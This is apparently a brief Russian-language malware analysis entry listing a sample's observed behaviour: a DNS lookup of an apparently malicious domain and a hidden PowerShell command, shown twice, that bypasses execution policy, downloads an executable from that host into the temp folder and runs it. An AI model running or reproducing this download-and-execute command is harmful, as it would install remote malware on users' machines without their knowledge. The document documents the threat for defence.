Техническая информация
- http://leader-techtw.com/target/targ.exe как %temp%\\newpo.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://leader-techtw.com/target/targ.exe','%TEMP%\\newpo.exe') & %TEMP%\\newpo.exe
- DNS ASK le####-techtw.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://leader-techtw.com/target/targ.exe','%TEMP%\\newpo.exe') & %TEMP%\\newpo.exe' (со скрытым окном)